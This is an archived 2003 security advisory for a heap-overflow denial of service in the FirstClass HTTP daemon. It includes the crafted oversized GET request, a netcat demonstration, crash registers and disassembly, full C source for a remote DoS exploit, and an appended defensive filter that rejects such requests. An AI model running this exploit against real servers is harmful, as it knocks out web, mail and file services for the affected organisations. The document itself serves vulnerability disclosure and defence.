I2S-LAB-25-09-2003.txt

Published 06 Oct 2003. Reported by Fred Chaverot. Type: packetstorm. Source: packetstormsecurity.com

Remote DoS vulnerability in FirstClass HTTP daemon affects multiple services via heap overflow.

Code

```text
###########################################################################################  
  
~ I2S LAB Security Advisory ~  
  
###########################################################################################  
http://www.I2S-LAB.com  
  
  
Date : 25/09/2003  
  
Affected systems : FirstClass build 133 (SP3) and previous versions HTTP Daemon  
  
Vendor : http://www.centrinity.com  
  
Issue : Attackers can remotely shut down internet services (HTTP/FTP/SMTP/POP3/IMAP4/...)  
  
  
Description  
___________  
  
FirstClass is a combination of solutions that allows a company to set up a reliable intranet   
by integrating powerful internet services and including most common communication protocols   
(SMTP/ HTTP/ FTP/ ...)  
  
  
Technical Details  
_________________  
  
FirstClass's "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, which could be caused   
by a heap overflow overwriting a data pointer.  
  
By sending a request on port 80 like: GET / HTTP/1.1[A x 246]  
  
FirstClass Internet Services will cause an access violation error by trying to read, somewhere in the  
heap, data located outside of the addressing space allocated by the process.  
  
  
D:\netcat>nc -vv 10.0.0.5 80  
I2S-w2k [10.0.0.5] 80 (http) open  
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAADDDD  
  
sent 262, rcvd 0: NOTSOCK  
  
D:\netcat>  
  
*** Exception in program C:\FCServer\fcintsrv.exe  
Location: CList::GetNext+0000003C (004F882C)  
Error: Access violation  
Cause: Read attempted at <Unknown> (4444444C)  
  
Registers:  
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here  
EDX=01F2415C ESI=00000000 EDI=00000000  
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206  
  
CS=0000001B DS=00000023 SS=00000023  
ES=00000023 FS=00000038 GS=00000000  
  
  
:004F881D 8B55FC mov edx, dword ptr [ebp-04]  
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000  
:004F8824 740B je 004F8831  
:004F8826 8B45FC mov eax, dword ptr [ebp-04]  
:004F8829 8B4804 mov ecx, dword ptr [eax+04]  
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs  
:004F882F EB02 jmp 004F8833  
  
  
Exploit  
_______  
  
  
/*******************************************  
* FirstClass Internet Services Remote DoS *  
*******************************************  
  
discovered & coded by I2S-LAB  
  
--------------------------------------------  
  
This exploit uses a ptr overflow to remotely   
shutdown the Internet Services of FirstClass.  
  
  
CONTACT  
_______  
  
Fred CHAVEROT : fred[at]I2S-LAB.com  
Aurélien BOUDOUX : aurelien[at]I2S-LAB.com  
  
  
URL : http://www.I2S-LaB.com  
  
*******************************************/  
  
  
#include <windows.h>  
#include <winsock.h>  
#include <stdio.h>   /* printf, puts */  
#include <string.h>  /* memset */  
#pragma comment (lib,"wsock32.lib")  
  
#define PerfectOverwrite 246  
  
int main (int argc, char *argv[])  
{  
  
int len;  
SOCKET sock1;  
SOCKADDR_IN sin;  
char *sav;  
  
WSADATA wsadata;  
WORD wVersionRequested = MAKEWORD (2,0);  
  
printf ("- FirstClass Internet Services Remote DoS -\n\n"  
"Discovered & coded by I2S-LAB\n"  
"http://www.I2S-LaB.com\n\n");  
  
  
if (!argv[1])  
{  
printf ("Usage : %s <IP Address>\n", argv[0]);  
ExitProcess (0);  
}  
  
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);  
  
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )  
{  
printf ("Error ! cannot allocate enough memory.\n");  
ExitProcess (0);   
}  
  
lstrcat (sav, "GET / HTTP/1.1");  
memset (&sav[14], 'A', PerfectOverwrite - 4);  
lstrcat (sav,"DDDD\r\n\r\n");  
  
sin.sin_family = AF_INET;  
sin.sin_port = htons (80);  
  
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)  
{  
printf ("Incorrect IP Address : %s\n", argv[1]);  
ExitProcess(0);  
}  
  
sock1 = socket (AF_INET, SOCK_STREAM, 0);  
  
printf ("\nconnecting to %s...", argv[1]);  
  
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )  
printf ("connection failed!\n");  
  
else  
{  
printf ("ok!\nSending crafted request...");  
  
send (sock1,sav, PerfectOverwrite + 18,0);  
puts ("ok!");  
}   
  
closesocket (sock1);  
}  
  
  
Solution  
________  
  
CENTRINITY Corp. has been warned and is currently working to fix the problem.  
  
Until further notice, we advise you to use a filter to restrict the length of HTTP requests sent to the server.  
  
  
Credits  
_______  
  
  
Aurélien BOUDOUX - aurelien[at]I2S-LaB.com  
Fred CHAVEROT - fred[at]I2S-LaB.com  
```
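The advisory's Solution section recommends filtering the length of HTTP requests, and its Technical Details section shows that the triggering request is "GET / HTTP/1.1" followed by 246 filler bytes, roughly 260 bytes in total, which is shorter than many legitimate request lines. The filter below is an added example, not code from the advisory or from FirstClass: it enforces a configurable length cap and, in addition, requires the request line to have the shape METHOD SP target SP HTTP/d.d CRLF, so the padded request is rejected because bytes follow the version token even when it is under the cap. The names (`check_request_line`, `check_padded_probe`, `RL_MAX_LINE`), the cap value and the sample requests are assumptions constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Verdicts returned by the request-line filter (names are this example's own). */
enum rl_verdict {
    RL_OK = 0,
    RL_INCOMPLETE,     /* no CRLF yet and still under the cap: keep reading */
    RL_TOO_LONG,       /* request line longer than the configured cap */
    RL_BAD_METHOD,     /* method is not 1..16 uppercase letters followed by SP */
    RL_BAD_TARGET,     /* request-target empty or containing control bytes */
    RL_BAD_VERSION,    /* version missing or not of the form HTTP/<d>.<d> */
    RL_TRAILING_DATA   /* extra bytes between the version and the CRLF */
};

/* Cap used by the demo below: an assumption for this example, not a FirstClass setting. */
#define RL_MAX_LINE 8190

/* Inspect the first request line in buf[0..len). Only the request line is
 * checked; headers after the first CRLF are left to the next stage. */
enum rl_verdict check_request_line(const char *buf, size_t len, size_t max_len)
{
    size_t line_len = 0, i = 0, start;
    /* Locate the CRLF that terminates the request line. */
    while (line_len + 1 < len &&
           !(buf[line_len] == '\r' && buf[line_len + 1] == '\n'))
        line_len++;
    if (line_len + 1 >= len)                 /* no CRLF in the buffer yet */
        return len > max_len ? RL_TOO_LONG : RL_INCOMPLETE;
    if (line_len > max_len)
        return RL_TOO_LONG;
    /* Method: 1..16 uppercase letters, then a single SP. */
    while (i < line_len && buf[i] >= 'A' && buf[i] <= 'Z')
        i++;
    if (i == 0 || i > 16 || i >= line_len || buf[i] != ' ')
        return RL_BAD_METHOD;
    i++;
    /* Request-target: one or more printable bytes, then SP. */
    for (start = i; i < line_len && buf[i] != ' '; i++) {
        unsigned char c = (unsigned char)buf[i];
        if (c < 0x21 || c == 0x7f)
            return RL_BAD_TARGET;
    }
    if (i == start)
        return RL_BAD_TARGET;
    if (i >= line_len)                       /* nothing after the target */
        return RL_BAD_VERSION;
    i++;
    /* Version: exactly "HTTP/<digit>.<digit>" ... */
    if (line_len - i < 8 || memcmp(buf + i, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)buf[i + 5]) || buf[i + 6] != '.' ||
        !isdigit((unsigned char)buf[i + 7]))
        return RL_BAD_VERSION;
    i += 8;
    /* ... immediately followed by the CRLF. Filler after the version token,
     * the shape of the request in the advisory, ends up here. */
    return i == line_len ? RL_OK : RL_TRAILING_DATA;
}

const char *rl_verdict_name(enum rl_verdict v)
{
    static const char *names[] = { "OK", "INCOMPLETE", "TOO_LONG", "BAD_METHOD",
                                   "BAD_TARGET", "BAD_VERSION", "TRAILING_DATA" };
    return names[v];
}

/* Build "GET / HTTP/1.1", `filler` bytes of 'A' and a blank line (the shape of the
 * advisory's request, constructed here only as filter input) and check it. */
enum rl_verdict check_padded_probe(size_t filler, size_t max_len)
{
    char req[1024];
    const char *prefix = "GET / HTTP/1.1", *suffix = "\r\n\r\n";
    size_t plen = strlen(prefix), slen = strlen(suffix);
    if (plen + filler + slen > sizeof req)   /* would not fit the scratch buffer */
        return RL_TOO_LONG;
    memcpy(req, prefix, plen);
    memset(req + plen, 'A', filler);
    memcpy(req + plen + filler, suffix, slen);
    return check_request_line(req, plen + filler + slen, max_len);
}

int main(void)
{
    static const char *samples[] = {
        "GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",  /* well-formed */
        "GET /\r\n",                                      /* no version */
        "get / HTTP/1.1\r\n",                             /* lowercase method */
        "GET / HTTP/1.1",                                 /* CRLF not yet received */
    };
    for (size_t n = 0; n < sizeof samples / sizeof samples[0]; n++)
        printf("sample %zu -> %s\n", n,
               rl_verdict_name(check_request_line(samples[n], strlen(samples[n]), RL_MAX_LINE)));
    printf("padded probe (246 filler bytes), cap %d -> %s\n", RL_MAX_LINE,
           rl_verdict_name(check_padded_probe(246, RL_MAX_LINE)));
    printf("padded probe (246 filler bytes), cap 200 -> %s\n",
           rl_verdict_name(check_padded_probe(246, 200)));
    return 0;
}
```

With the default cap the padded probe passes the length check and is still rejected as TRAILING_DATA; with a cap of 200 it is rejected as TOO_LONG before any parsing. Returning RL_INCOMPLETE for a line without CRLF lets a front end keep reading until either the terminator or the cap is reached, so the cap also bounds how much a slow sender can make it buffer.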
